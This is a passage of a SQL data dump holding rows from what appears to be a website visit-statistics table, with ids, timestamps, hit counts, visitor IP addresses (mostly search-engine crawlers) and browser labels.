2,0,2,0,'68.180.231.29',''),(31305,1459601522,4,4,0,0,'69.30.215.130','other'),(31306,1459601649,1,1,0,0,'62.210.215.100','chrome'),(31307,1459601761,1,1,0,0,'91.196.178.135','chrome'),(31308,1459602233,2,0,2,0,'66.249.64.223',''),(31309,1459602345,1,1,0,0,'95.135.91.178','firefox'),(31310,1459603248,1,1,0,0,'5.255.253.113','other'),(31311,1459603264,1,1,0,0,'217.69.136.208','other'),(31312,1459603265,1,1,0,0,'217.69.136.203','other'),(31313,1459603271,1,1,0,0,'66.249.89.118','other'),(31314,1459603391,1,1,0,0,'217.69.133.223','other'),(31315,1459603425,1,1,0,0,'207.46.13.94','other'),(31316,1459603597,2,0,2,0,'66.249.64.228',''),(31317,1459603711,1,1,0,0,'40.77.167.35','other'),(31318,1459603731,1,1,0,0,'141.8.132.105','other'),(31319,1459603794,1,1,0,0,'164.132.161.28','other'),(31320,1459603846,3,3,0,0,'213.251.184.38','other'),(31321,1459604383,1,1,0,0,'51.255.65.3','other'),(31322,1459604709,4,4,0,0,'173.234.159.250','other'),(31323,1459604942,39,39,0,0,'51.255.201.95','other'),(31324,1459604985,1,1,0,0,'141.8.183.25','other'),(31325,1459605329,93,93,0,0,'142.54.184.90','other'),(31326,1459605406,1,0,1,0,'68.180.231.29',''),(31327,1459605522,1,0,1,0,'66.249.64.233',''),(31328,1459605600,1,1,0,0,'217.69.133.226','other'),(31329,1459606009,1,1,0,0,'217.69.133.228','other'),(31330,1459606174,1,1,0,0,'8.29.198.25','other'),(31331,1459606315,1,1,0,0,'130.193.50.34','other'),(31333,1459606317,1,1,0,0,'130.193.51.83','other'),(31334,1459606319,2,2,0,0,'5.255.253.113','other'),(31335,1459606410,1,1,0,0,'217.69.133.233','other'),(31336,1459606521,1,0,1,0,'66.249.64.233',''),(31337,1459606666,4,4,0,0,'92.236.71.145','other'),(31338,1459606972,2,2,0,0,'217.69.133.215','other'),(31339,1459607142,1,0,1,0,'66.249.64.228',''),(31340,1459607494,1,1,0,0,'66.249.64.233','other'),(31341,1459607661,1,0,1,0,'66.249.64.150',''),(31342,1459608465,1,1,0,0,'217.69.133.239','other'),(31343,1459608480,2,2,0,0,'130.193.50.34','other'),(31344,1459608522,1,0,1,0,'66.249.64.162',''),(31345,1459608603,1,1,0,0,'217.69.133.68','other'),(31346,1459608604,1,1,0,0,'217.69.133.222','other'),(31347,1459608664,2,0,2,0,'66.249.64.233',''),(31348,1459609221,1,0,1,0,'68.180.229.103',''),(31349,1459609533,2,0,2,0,'66.249.64.223',''),(31350,1459609876,1,1,0,0,'217.69.133.234','other'),(31351,1459609922,2,0,2,0,'66.249.64.228',''),(31352,1459610368,1,0,1,0,'68.180.229.103',''),(31353,1459610430,1,0,1,0,'66.249.64.233',''),(31354,1459610463,2,2,0,0,'141.8.132.105','other'),(31355,1459610464,1,1,0,0,'141.8.183.25','other'),(31356,1459610479,1,1,0,0,'182.118.20.229','msie'),(31357,1459610584,1,0,1,0,'66.249.64.223',''),(31358,1459610803,1,0,1,0,'68.180.231.29',''),(31359,1459610845,1,1,0,0,'217.69.133.221','other'),(31360,1459611122,1,1,0,0,'217.69.133.233','other'),(31361,1459611281,1,1,0,0,'91.196.178.102','chrome'),(31362,1459612037,1,0,1,0,'66.249.64.233',''),(31363,1459612633,1,1,0,0,'141.8.142.58','other'),(31364,1459612634,1,1,0,0,'130.193.51.83','other'),(31365,1459613039,2,0,2,0,'68.180.229.103',''),(31366,1459613533,3,0,3,0,'66.249.64.223',''),(31367,1459613612,3,3,0,0,'130.193.50.34','other'),(31368,1459613673,1,1,0,0,'217.69.133.234','other'),(31369,1459613853,1,1,0,0,'217.69.133.219','other'),(31370,1459613993,1,1,0,0,'66.249.89.116','other'),(31371,1459614043,1,1,0,0,'164.132.161.48','other'),(31372,1459614113,1,0,1,0,'66.249.64.162',''),(31373,1459614264,5,5,0,0,'130.193.51.83','other'),(31374,1459614273,2,2,0,0,'130.193.51.19','other'),(31375,1459614278,2,2,0,0,'141.8.132.105','other'),(31376,1459614283,3,3,0,0,'5.255.253.113','other'),(31377,1459614284,4,4,0,0,'141.8.183.25','other'),(31378,1459614442,2,0,2,0,'66.249.64.228',''),(31379,1459614462,2,0,2,0,'66.249.64.223',''),(31380,1459614540,1,1,0,0,'91.196.178.65','firefox'),(31381,1459614880,2,0,2,0,'66.249.64.156',''),(31382,1459615038,2,0,2,0,'68.180.231.29',''),(31383,1459615236,1,0,1,0,'66.249.64.150',''),(31384,1459615514,4,0,4,0,'66.249.64.223',''),(31385,1459615711,1,1,0,0,'217.69.133.68','other'),(31386,1459615730,1,1,0,0,'66.249.64.228','other'),(31387,1459615817,3,3,0,0,'141.8.132.105','other'),(31388,1459615818,1,1,0,0,'5.255.253.113','other'),(31389,1459615819,2,2,0,0,'130.193.50.34','other'),(31390,1459615827,1,1,0,0,'207.46.13.103','other'),(31391,1459616108,1,1,0,0,'66.249.64.223','other'),(31392,1459616253,2,2,0,0,'69.30.214.38','other'),(31393,1459616688,2,1,1,0,'66.249.64.228',''),(31394,1459616759,300,300,0,0,'195.154.185.20','other'),(31395,1459616768,1,1,0,0,'217.69.133.218','other'),(31396,1459617009,1,1,0,0,'8.29.198.25','other'),(31397,1459617115,1,1,0,0,'130.193.51.83','other'),(31398,1459617757,1,1,0,0,'141.8.142.67','other'),(31399,1459617758,1,1,0,0,'141.8.142.58','other'),(31401,1459618028,1,1,0,0,'217.69.133.217','other'),(31402,1459618348,2,2,0,0,'130.193.50.34','other'),(31403,1459618625,1,1,0,0,'157.55.39.254','other'),(31404,1459618696,1,1,0,0,'217.69.133.236','other'),(31405,1459618744,1,1,0,0,'217.69.133.69','other'),(31406,1459618747,2,2,0,0,'141.8.142.58','other'),(31407,1459618881,1,1,0,0,'217.69.143.49','other'),(31408,1459619197,1,1,0,0,'217.69.133.215','other'),(31409,1459619198,1,0,1,0,'66.249.64.233',''),(31410,1459619648,3,3,0,0,'130.193.50.34','other'),(31411,1459619657,1,1,0,0,'141.8.142.58','other'),(31412,1459619658,1,1,0,0,'130.193.51.83','other'),(31413,1459619659,1,1,0,0,'141.8.132.105','other'),(31414,1459619951,1,0,1,0,'66.249.64.228',''),(31415,1459620194,1,1,0,0,'217.69.133.68','other'),(31416,1459620531,1,1,0,0,'91.196.178.135','chrome'),(31417,1459620927,1,1,0,0,'141.8.132.105','other'),(31418,1459620937,1,1,0,0,'141.8.183.25','other'),(31419,1459621024,1,1,0,0,'37.204.154.137','msie'),(31420,1459621026,1,1,0,0,'46.242.121.156','chrome'),(31421,1459621029,1,1,0,0,'46.188.72.113','opera'),(31422,1459621030,1,1,0,0,'5.165.251.163','msie'),(31424,1459621240,1,0,1,0,'68.180.231.29',''),(31425,1459621511,1,1,0,0,'217.69.133.227','other'),(31426,1459621907,1,1,0,0,'5.255.253.113','other'),(31427,1459621908,1,1,0,0,'141.8.183.25','other'),(31429,1459622112,1,1,0,0,'51.255.65.64','other'),(31430,1459622290,1,1,0,0,'207.46.13.94','other'),(31431,1459622510,1,0,1,0,'66.249.64.228',''),(31432,1459622703,1,0,1,0,'66.249.64.233',''),(31433,1459622792,1,1,0,0,'217.69.133.223','other'),(31434,1459622891,1,1,0,0,'141.8.142.58','other'),(31435,1459623024,1,0,1,0,'68.180.231.29',''),(31436,1459623610,1,1,0,0,'130.193.50.34','other'),(31437,1459623611,2,2,0,0,'141.8.142.67','other'),(31438,1459623655,1,1,0,0,'217.69.133.220','other'),(31439,1459623656,1,1,0,0,'217.69.133.224','other'),(31440,1459623740,1,1,0,0,'94.178.167.240','chrome'),(31441,1459624083,1,1,0,0,'5.255.253.113','other'),(31442,1459624419,1,1,0,0,'37.53.225.74','chrome'),(31443,1459624440,1,0,1,0,'68.180.231.29',''),(31444,1459624472,1,1,0,0,'92.113.190.204','chrome'),(31445,1459624888,1,1,0,0,'5.255.253.67','other'),(31447,1459624889,1,1,0,0,'178.154.149.10','other'),(31448,1459624890,1,1,0,0,'130.193.51.14','other'),(31449,1459624891,1,1,0,0,'93.158.152.51','other'),(31450,1459624892,1,1,0,0,'130.193.37.7','other'),(31452,1459624893,1,1,0,0,'178.154.189.31','other'),(31453,1459624894,1,1,0,0,'178.154.189.37','other'),(31454,1459624895,1,1,0,0,'141.8.132.101','other'),(31456,1459624896,1,1,0,0,'130.193.50.38','other'),(31457,1459624897,1,1,0,0,'93.158.152.61','other'),(31458,1459624898,1,1,0,0,'5.255.253.68','other'),(31460,1459624899,1,1,0,0,'141.8.132.41','other'),(31461,1459624900,1,1,0,0,'130.193.50.34','other'),(31462,1459624901,1,1,0,0,'141.8.132.105','other'),(31463,1459624921,1,1,0,0,'66.249.89.114','other'),(31464,1459624981,1,1,0,0,'164.132.161.94','other'),(31465,1459625132,2,2,0,0,'157.55.39.9','other'),(31466,1459625450,1,1,0,0,'164.132.161.68','other'),(31467,1459625567,1,1,0,0,'157.55.39.254','other'),(31468,1459625590,1,0,1,0,'66.249.64.228',''),(31469,1459625617,2,0,2,0,'66.249.64.223',''),(31470,1459625693,1,1,0,0,'217.69.133.238','other'),(31471,1459626012,1,0,1,0,'66.249.64.162',''),(31472,1459626129,1,1,0,0,'157.55.39.9','other'),(31473,1459626139,1,1,0,0,'217.69.133.236','other'),(31474,1459626264,1,0,1,0,'66.249.64.233',''),(31475,1459626270,1,1,0,0,'66.249.64.228','other'),(31476,1459626404,1,1,0,0,'217.69.133.2','other'),(31477,1459626481,1,1,0,0,'180.76.15.142','other'),(31478,1459626700,1,1,0,0,'217.69.133.234','other'),(31479,1459627191,1,1,0,0,'66.249.64.228','other'),(31480,1459627206,1,1,0,0,'207.46.13.103','other'),(31481,1459627314,1,1,0,0,'95.135.91.178','firefox'),(31482,1459627900,1,1,0,0,'8.29.198.25','other'),(31483,1459628245,1,1,0,0,'207.46.13.103','other'),(31484,1459628484,1,0,1,0,'66.249.64.233',''),(31485,1459628491,1,1,0,0,'217.69.133.69','other'),(31486,1459628838,1,1,0,0,'151.80.31.102','other'),(31487,1459629161,1,1,0,0,'217.69.133.218','other'),(31488,1459629426,1,1,0,0,'130.193.50.34','other'),(31489,1459629547,1,1,0,0,'217.69.133.68','other'),(31490,1459629746,1,1,0,0,'217.69.133.219','other'),(31491,1459629893,1,1,0,0,'5.9.62.130','other'),(31492,1459630059,1,0,1,0,'68.180.231.29',''),(31493,1459630348,1,1,0,0,'151.80.31.100','other'),(31494,1459631213,2,0,2,0,'66.249.64.228',''),(31495,1459631303,1,0,1,0,'66.249.64.223',''),(31496,1459631504,2,2,0,0,'130.193.50.34','other'),(31497,1459631683,2,2,0,0,'141.8.132.105','other'),(31498,1459631740,1,0,1,0,'66.249.64.162',''),(31499,1459631747,1,1,0,0,'180.76.15.151','other'),(31500,1459632361,1,0,1,0,'66.249.64.223',''),(31501,1459632792,1,1,0,0,'66.249.64.223','other'),(31502,1459632963,1,1,0,0,'217.69.133.221','other'),(31503,1459633147,1,1,0,0,'217.69.133.220','other'),(31504,1459633304,1,1,0,0,'37.73.224.110','chrome'),(31505,1459633645,1,1,0,0,'40.77.167.100','other'),(31506,1459633868,1,1,0,0,'217.69.133.217','other'),(31507,1459633952,1,1,0,0,'217.69.133.67','other'),(31508,1459634468,1,1,0,0,'217.69.133.220','other'),(31509,1459634469,1,1,0,0,'217.69.133.221','other'),(31510,1459634592,1,1,0,0,'130.193.50.34','other'),(31511,1459634874,1,0,1,0,'66.249.64.228',''),(31512,1459635433,1,0,1,0,'66.249.64.223',''),(31513,1459635588,1,1,0,0,'40.77.167.70','other'),(31514,1459635761,1,1,0,0,'66.249.89.118','other'),(31515,1459636170,1,0,1,0,'66.249.64.233',''),(31516,1459636532,1,0,1,0,'66.249.64.228',''),(31517,1459636767,1,1,0,0,'157.55.39.254','other'),(31518,1459636775,1,0,1,0,'66.249.64.156',''),(31519,1459636776,1,1,0,0,'66.249.64.223','chrome'),(31520,1459636843,1,1,0,0,'66.249.64.162','other'),(31521,1459636939,1,1,0,0,'62.210.215.100','chrome'),(31522,1459636991,1,0,1,0,'68.180.231.29',''),(31523,1459637202,1,1,0,0,'94.142.141.119','firefox'),(31524,1459637469,1,1,0,0,'217.69.133.225','other'),(31525,1459637470,1,1,0,0,'217.69.133.220','other'),(31526,1459637789,1,0,1,0,'66.249.64.228',''),(31527,1459637926,1,0,1,0,'68.180.231.29',''),(31528,1459638044,1,0,1,0,'66.249.64.233',''),(31529,1459638234,1,1,0,0,'130.193.50.34','other'),(31530,1459638480,1,1,0,0,'178.154.189.202','other'),(31531,1459638754,1,1,0,0,'8.29.198.25','other'),(31532,1459638780,3,1,2,0,'66.249.64.233',''),(31533,1459638845,1,1,0,0,'141.8.132.105','other'),(31534,1459639292,1,1,0,0,'217.69.133.227','other'),(31535,1459639442,1,1,0,0,'217.69.133.229','other'),(31536,1459639443,1,1,0,0,'217.69.133.231','other'),(31537,1459639884,1,1,0,0,'37.9.122.201','other'),(31538,1459640363,2,2,0,0,'217.69.133.215','other'),(31539,1459640790,1,1,0,0,'217.69.133.218','other'),(31540,1459640791,1,1,0,0,'217.69.133.67','other'),(31541,1459640900,2,2,0,0,'130.193.50.34','other'),(31542,1459641396,1,0,1,0,'66.249.64.223',''),(31543,1459641433,1,1,0,0,'217.69.133.238','other'),(31544,1459641811,8,8,0,0,'157.55.39.254','other'),(31545,1459641829,7,7,0,0,'157.55.39.9','other'),(31546,1459641867,5,5,0,0,'40.77.167.70','other'),(31547,1459641992,5,5,0,0,'40.77.167.100','other'),(31548,1459642239,1,0,1,0,'66.249.64.156',''),(31549,1459642395,1,1,0,0,'217.69.143.45','other'),(31550,1459642637,1,0,1,0,'66.249.64.223',''),(31551,1459642926,2,2,0,0,'5.9.11.122','chrome'),(31552,1459642929,2,0,2,0,'66.249.64.228',''),(31553,1459643042,1,1,0,0,'217.69.133.227','other'),(31554,1459643135,2,0,2,0,'68.180.231.29',''),(31555,1459643629,2,2,0,0,'130.193.50.34','other'),(31556,1459643887,1,1,0,0,'141.8.132.105','other'),(31557,1459643996,3,0,3,0,'66.249.64.233',''),(31558,1459644290,1,1,0,0,'217.69.133.221','other'),(31559,1459644391,1,0,1,0,'66.249.64.223',''),(31560,1459644419,2,0,2,0,'68.180.231.29',''),(31561,1459644472,1,0,1,0,'66.249.64.162',''),(31562,1459644518,1,0,1,0,'66.249.64.156',''),(31563,1459644752,1,1,0,0,'141.8.183.25','other'),(31564,1459645281,2,2,0,0,'157.55.39.254','other'),(31565,1459645500,1,0,1,0,'66.249.64.233',''),(31566,1459645512,3,0,3,0,'66.249.64.223',''),(31567,1459645948,1,1,0,0,'217.69.133.220','other'),(31568,1459645954,1,1,0,0,'178.154.189.202','other'),(31569,1459646081,1,1,0,0,'66.249.89.118','other'),(31570,1459646345,1,1,0,0,'217.69.133.231','other'),(31571,1459646423,1,1,0,0,'217.69.133.217','other'),(31572,1459646501,1,0,1,0,'68.180.231.29',''),(31573,1459646848,1,1,0,0,'217.69.133.238','other'),(31574,1459646913,1,0,1,0,'66.249.64.101',''),(31575,1459647494,1,0,1,0,'66.249.64.96',''),(31576,1459647872,2,0,2,0,'66.249.64.233',''),(31577,1459647961,1,0,1,0,'66.249.64.228',''),(31578,1459648068,1,1,0,0,'130.193.51.83','other'),(31579,1459648077,2,2,0,0,'130.193.50.34','other'),(31580,1459648876,2,0,2,0,'68.180.231.29',''),(31581,1459649245,1,1,0,0,'5.255.253.113','other'),(31582,1459649296,1,1,0,0,'217.69.133.223','other'),(31584,1459649344,1,0,1,0,'66.249.64.228',''),(31585,1459649486,1,1,0,0,'130.193.50.34','other'),(31586,1459649605,1,1,0,0,'8.29.198.26','other'),(31587,1459649766,1,0,1,0,'66.249.64.223',''),(31588,1459650411,1,1,0,0,'130.193.50.34','other'),(31589,1459650579,1,1,0,0,'37.213.6.8','chrome'),(31590,1459651243,1,1,0,0,'51.255.65.8','other'),(31591,1459651252,1,1,0,0,'217.69.143.46','other'),(31592,1459651668,1,0,1,0,'66.249.64.150',''),(31593,1459651763,1,0,1,0,'68.180.231.29',''),(31594,1459651919,1,1,0,0,'151.80.31.156','other'),(31595,1459652502,1,1,0,0,'217.69.133.239','other'),(31596,1459652730,1,1,0,0,'130.193.50.34','other'),(31597,1459652739,1,1,0,0,'180.76.15.150','other'),(31598,1459652794,1,1,0,0,'217.69.133.84','other'),(31599,1459653428,1,0,1,0,'68.180.231.29',''),(31600,1459653481,1,1,0,0,'151.80.31.158','other'),(31601,1459653505,1,1,0,0,'164.132.161.13','other'),(31602,1459653629,1,0,1,0,'68.180.229.103',''),(31603,1459653872,1,1,0,0,'51.255.65.69','other'),(31604,1459654105,1,1,0,0,'157.55.39.254','other'),(31605,1459654402,2,0,2,0,'66.249.64.223',''),(31606,1459654642,1,0,1,0,'66.249.64.233',''),(31607,1459654674,1,1,0,0,'217.69.133.223','other'),(31608,1459654990,1,1,0,0,'51.255.65.95','other'),(31609,1459655170,1,1,0,0,'93.158.152.203','other'),(31610,1459655215,3,0,3,0,'66.249.64.228',''),(31611,1459655218,2,2,0,0,'178.154.189.204','other'),(31612,1459655504,1,1,0,0,'151.80.31.101','other'),(31613,1459655518,1,1,0,0,'178.154.189.203','other'),(31614,1459655923,2,0,2,0,'66.249.64.223',''),(31615,1459656031,2,2,0,0,'130.193.50.34','other'),(31616,1459656231,2,2,0,0,'178.154.189.202','other'),(31617,1459656287,2,2,0,0,'37.9.122.201','other'),(31618,1459656593,1,1,0,0,'217.69.133.233','other'),(31619,1459656594,1,1,0,0,'217.69.133.227','other'),(31620,1459656595,1,1,0,0,'217.69.133.228','other'),(31621,1459656625,1,1,0,0,'178.154.189.203','other'),(31622,1459656827,3,0,3,0,'66.249.64.223',''),(31623,1459656905,2,0,2,0,'66.249.64.233',''),(31624,1459657136,1,1,0,0,'66.249.89.114','other'),(31625,1459657400,1,1,0,0,'178.154.189.201','other'),(31626,1459657405,1,1,0,0,'93.158.152.201','other'),(31627,1459657459,1,1,0,0,'217.69.133.223','other'),(31628,1459657489,1,1,0,0,'130.193.50.201','other'),(31629,1459657601,1,1,0,0,'217.69.133.227','other'),(31630,1459657614,1,1,0,0,'217.69.133.67','other'),(31631,1459657618,1,1,0,0,'217.69.133.218','other'),(31632,1459657751,1,0,1,0,'66.249.64.228',''),(31633,1459657822,3,0,3,0,'66.249.64.233',''),(31634,1459658259,1,1,0,0,'217.69.133.231','other'),(31635,1459658722,1,0,1,0,'66.249.64.228',''),(31636,1459658894,1,1,0,0,'217.69.133.67','other'),(31637,1459659135,1,1,0,0,'164.132.161.84','other'),(31638,1459659264,1,1,0,0,'157.55.39.147','other'),(31639,1459659330,1,1,0,0,'180.76.15.34','other'),(31640,1459659335,5,5,0,0,'130.193.50.34','other'),(31641,1459659501,1,1,0,0,'217.69.133.235','other'),(31642,1459659759,8,0,8,0,'68.180.231.29',''),(31643,1459659824,1,1,0,0,'141.8.183.25','other'),(31644,1459659881,1,1,0,0,'157.55.39.254','other'),(31645,1459659889,1,1,0,0,'40.77.167.70','other'),(31646,1459660149,1,0,1,0,'66.249.64.228',''),(31647,1459660218,2,2,0,0,'141.8.132.105','other'),(31648,1459660431,1,1,0,0,'8.29.198.25','other'),(31649,1459661231,1,1,0,0,'217.69.133.220','other'),(31650,1459661232,1,1,0,0,'217.69.133.68','other'),(31651,1459661233,1,1,0,0,'217.69.133.224','other'),(31652,1459661346,2,1,1,0,'66.249.64.223',''),(31653,1459661380,2,1,1,0,'66.249.64.228',''),(31654,1459661459,24,24,0,0,'130.193.50.34','other'),(31655,1459661683,1,1,0,0,'92.113.190.44','chrome'),(31656,1459661790,1,1,0,0,'130.193.50.6','other'),(31657,1459661793,1,1,0,0,'93.158.152.46','other'),(31658,1459661796,1,1,0,0,'141.8.142.58','other'),(31659,1459661799,4,4,0,0,'130.193.51.19','other'),(31660,1459661811,10,10,0,0,'141.8.132.105','other'),(31661,1459661823,6,6,0,0,'141.8.183.25','other'),(31662,1459661829,6,6,0,0,'5.255.253.113','other'),(31663,1459661997,1,0,1,0,'66.249.64.150',''),(31664,1459662500,4,4,0,0,'130.193.50.34','other'),(31665,1459662721,3,3,0,0,'141.8.132.105','other'),(31666,1459662813,1,0,1,0,'68.180.231.29',''),(31667,1459663016,1,0,1,0,'66.249.64.223',''),(31668,1459663020,1,1,0,0,'217.69.133.85','other'),(31669,1459663057,1,1,0,0,'217.69.133.221','other'),(31670,1459663277,1,1,0,0,'164.132.161.49','other'),(31671,1459663291,2,1,1,0,'66.249.64.228',''),(31672,1459663355,2,0,2,0,'66.249.64.233',''),(31673,1459663489,1,1,0,0,'217.69.133.232','other'),(31674,1459663517,4,4,0,0,'130.193.50.34','other'),(31675,1459663669,2,2,0,0,'141.8.132.105','other'),(31676,1459663822,1,1,0,0,'217.69.133.228','other'),(31677,1459663848,2,2,0,0,'157.55.39.254','other'),(31678,1459664051,2,0,2,0,'66.249.64.223',''),(31679,1459664338,2,1,1,0,'66.249.64.223',''),(31680,1459664625,2,2,0,0,'141.8.132.105','other'),(31681,1459664629,2,2,0,0,'217.69.133.84','other'),(31682,1459664675,1,1,0,0,'217.69.133.68','other'),(31683,1459664721,1,1,0,0,'51.255.65.33','other'),(31684,1459664776,316,316,0,0,'5.79.68.56','other'),(31685,1459664832,1,1,0,0,'66.249.93.67','chrome'),(31686,1459664929,1,1,0,0,'130.193.50.34','other'),(31687,1459665085,1,1,0,0,'157.55.39.147','other'),(31688,1459665212,1,1,0,0,'66.249.64.228','other'),(31689,1459665291,1,1,0,0,'217.69.143.68','other'),(31690,1459665441,2,0,2,0,'68.180.231.29',''),(31691,1459665560,1,1,0,0,'5.255.253.113','other'),(31692,1459665721,1,1,0,0,'93.158.152.61','other'),(31693,1459666410,2,0,2,0,'66.249.64.233',''),(31694,1459666478,1,1,0,0,'178.154.189.31','other'),(31695,1459666482,1,1,0,0,'141.8.183.19','other'),(31696,1459666495,1,1,0,0,'217.69.143.49','other'),(31697,1459666669,1,1,0,0,'151.80.31.108','other'),(31698,1459666677,2,2,0,0,'141.8.183.25','other'),(31699,1459666756,1,0,1,0,'66.249.64.228',''),(31700,1459666766,3,1,2,0,'66.249.64.223',''),(31701,1459666842,1,1,0,0,'141.8.142.62','other'),(31702,1459666850,1,1,0,0,'217.69.133.220','other'),(31703,1459667003,1,1,0,0,'157.55.39.9','other'),(31704,1459667147,1,1,0,0,'130.193.50.34','other'),(31705,1459667581,1,1,0,0,'66.249.89.116','other'),(31706,1459667611,1,1,0,0,'93.158.152.61','other'),(31707,1459667772,1,1,0,0,'178.154.189.31','other'),(31708,1459667783,5,0,5,0,'66.249.64.223',''),(31709,1459667812,1,1,0,0,'164.132.161.63','other'),(31710,1459667851,1,1,0,0,'217.69.133.225','other'),(31711,1459667852,1,1,0,0,'217.69.133.220','other'),(31713,1459667853,2,2,0,0,'217.69.133.68','other'),(31714,1459667903,1,1,0,0,'130.193.51.83','other'),(31715,1459668185,1,1,0,0,'217.69.133.231','other'),(31716,1459668186,1,1,0,0,'217.69.133.227','other'),(31718,1459668219,2,2,0,0,'5.255.253.113','other'),(31719,1459668239,1,1,0,0,'141.8.183.25','other'),(31720,1459668338,2,0,2,0,'66.249.64.228',''),(31721,1459668340,3,3,0,0,'130.193.50.34','other'),(31722,1459668443,1,1,0,0,'130.193.51.19','other'),(31723,1459668461,1,1,0,0,'217.69.133.215','other'),(31724,1459668475,1,0,1,0,'66.249.64.156',''),(31725,1459668494,2,2,0,0,'40.77.167.70','other'),(31726,1459668542,2,2,0,0,'141.8.132.105','other'),(31727,1459668741,1,0,1,0,'68.180.231.29',''),(31728,1459668795,1,1,0,0,'178.154.189.37','other'),(31729,1459668799,1,1,0,0,'141.8.132.101','other'),(31730,1459668840,1,1,0,0,'157.55.39.254','other'),(31731,1459668856,1,1,0,0,'123.125.71.80','other'),(31732,1459669153,1,0,1,0,'66.249.64.223',''),(31733,1459669308,1,1,0,0,'217.69.133.232','other'),(31734,1459669470,3,1,2,0,'66.249.64.223',''),(31735,1459669618,1,1,0,0,'217.69.133.234','other'),(31736,1459669843,1,0,1,0,'66.249.64.228',''),(31737,1459670038,3,0,3,0,'68.180.231.29',''),(31738,1459670099,4,4,0,0,'5.255.253.113','other'),(31739,1459670119,6,6,0,0,'130.193.50.34','other'),(31740,1459670192,1,1,0,0,'130.193.51.83','other'),(31741,1459670252,1,1,0,0,'217.69.133.223','other'),(31742,1459670282,1,1,0,0,'136.243.152.18','other'),(31743,1459670513,1,1,0,0,'178.154.189.202','other'),(31744,1459670751,1,1,0,0,'141.8.183.25','other'),(31745,1459670797,1,1,0,0,'51.255.65.43','other'),(31746,1459670862,1,1,0,0,'66.249.64.223','other'),(31747,1459670865,1,1,0,0,'217.69.133.70','other'),(31748,1459671231,1,1,0,0,'5.255.253.113','other'),(31749,1459671263,1,1,0,0,'94.179.71.35','firefox'),(31750,1459671291,1,1,0,0,'8.29.198.26','other'),(31751,1459671326,1,1,0,0,'141.8.132.10','other'),(31752,1459671355,1,1,0,0,'37.213.12.107','chrome'),(31753,1459671394,1,1,0,0,'141.8.142.67','other'),(31754,1459671537,1,1,0,0,'178.154.189.31','other'),(31755,1459671709,1,1,0,0,'178.154.189.201','other'),(31756,1459671713,1,1,0,0,'130.193.50.201','other'),(31757,1459671716,3,3,0,0,'178.154.189.202','other'),(31758,1459671763,1,1,0,0,'5.255.253.68','other'),(31759,1459671782,1,1,0,0,'82.145.211.59','opera'),(31760,1459671974,1,1,0,0,'130.193.51.79','other'),(31761,1459671982,1,1,0,0,'217.69.133.222','other'),(31762,1459672081,1,1,0,0,'93.158.152.61','other'),(31763,1459672184,1,1,0,0,'93.158.152.84','other'),(31764,1459672658,1,0,1,0,'68.180.231.29',''),(31765,1459673087,1,1,0,0,'141.8.132.105','other'),(31766,1459673125,1,1,0,0,'217.69.133.223','other'),(31767,1459673665,1,0,1,0,'68.180.231.29',''),(31768,1459673930,1,1,0,0,'66.249.64.156','other'),(31769,1459674131,1,1,0,0,'217.69.133.220','other'),(31770,1459674415,1,1,0,0,'66.249.64.162','other'),(31771,1459674583,1,1,0,0,'217.69.133.85','other'),(31772,1459674584,1,1,0,0,'217.69.133.215','other'),(31773,1459674634,1,1,0,0,'62.210.215.100','chrome'),(31774,1459674751,1,1,0,0,'141.8.183.25','other'),(31775,1459674986,1,1,0,0,'217.69.133.237','other'),(31776,1459674987,1,1,0,0,'217.69.133.239','other'),(31777,1459675055,5,5,0,0,'69.197.177.50','other'),(31778,1459675270,1,0,1,0,'68.180.231.29',''),(31779,1459675525,1,1,0,0,'93.158.152.84','other'),(31780,1459675529,1,1,0,0,'130.193.51.79','other'),(31781,1459675533,1,1,0,0,'5.255.253.67','other'),(31782,1459675850,1,1,0,0,'157.55.39.147','other'),(31783,1459675972,1,1,0,0,'91.196.178.65','chrome'),(31784,1459676003,1,1,0,0,'217.69.133.238','other'),(31785,1459676004,1,1,0,0,'217.69.133.239','other'),(31786,1459676005,1,1,0,0,'217.69.133.234','other'),(31787,1459676012,1,1,0,0,'130.193.50.38','other'),(31788,1459676026,1,1,0,0,'180.76.15.24','other'),(31789,1459676259,1,1,0,0,'217.69.133.224','other'),(31790,1459676709,1,1,0,0,'141.8.183.19','other'),(31791,1459676852,1,1,0,0,'130.193.50.34','other'),(31792,1459676897,1,1,0,0,'141.8.183.25','other'),(31793,1459676943,1,1,0,0,'91.196.178.65','chrome'),(31794,1459677281,1,1,0,0,'66.249.64.156','other'),(31795,1459677955,2,2,0,0,'130.193.50.34','other'),(31796,1459678001,1,1,0,0,'217.69.133.220','other'),(31797,1459678002,1,1,0,0,'217.69.133.221','other'),(31798,1459678251,1,1,0,0,'66.249.89.118','other'),(31799,1459678284,1,1,0,0,'91.196.178.65','chrome'),(31800,1459678991,1,1,0,0,'141.8.183.25','other'),(31801,1459679075,1,1,0,0,'217.69.133.69','other'),(31802,1459679297,2,2,0,0,'130.193.50.34','other'),(31803,1459679488,1,1,0,0,'217.69.133.232','other'),(31804,1459679689,1,1,0,0,'5.255.253.113','other'),(31805,1459679705,1,1,0,0,'94.179.123.102','firefox'),(31806,1459679746,1,0,1,0,'66.249.64.233',''),(31807,1459680118,1,0,1,0,'66.249.64.156',''),(31808,1459680249,1,1,0,0,'217.69.133.221','other'),(31809,1459680258,2,2,0,0,'141.8.183.25','other'),(31810,1459680371,1,1,0,0,'217.69.133.234','other'),(31811,1459680372,1,1,0,0,'217.69.133.238','other'),(31812,1459680481,1,1,0,0,'130.193.50.34','other'),(31813,1459680898,1,1,0,0,'217.69.133.217','other'),(31814,1459680899,1,1,0,0,'217.69.133.215','other'),(31815,1459680900,2,2,0,0,'217.69.133.84','other'),(31816,1459681006,1,1,0,0,'217.69.133.230','other'),(31817,1459681149,1,1,0,0,'91.196.178.162','chrome'),(31818,1459681206,1,0,1,0,'66.249.64.228',''),(31819,1459681218,1,1,0,0,'130.193.51.19','other'),(31820,1459681288,1,1,0,0,'141.8.183.25','other'),(31821,1459681338,1,1,0,0,'91.196.178.65','chrome'),(31822,1459681429,1,1,0,0,'217.69.133.216','other'),(31823,1459681687,1,1,0,0,'217.69.133.85','other'),(31824,1459681689,1,1,0,0,'217.69.133.218','other'),(31825,1459682177,1,1,0,0,'8.29.198.25','other'),(31826,1459682496,1,0,1,0,'66.249.64.228',''),(31827,1459683017,1,1,0,0,'207.46.13.56','other'),(31828,1459683033,1,0,1,0,'68.180.231.29',''),(31829,1459683053,1,1,0,0,'5.255.253.113','other'),(31830,1459683146,4,4,0,0,'91.121.169.194','other'),(31831,1459683548,1,1,0,0,'130.193.50.34','other'),(31832,1459683702,1,1,0,0,'141.8.132.105','other'),(31833,1459684295,2,2,0,0,'141.8.183.25','other'),(31834,1459684317,1,1,0,0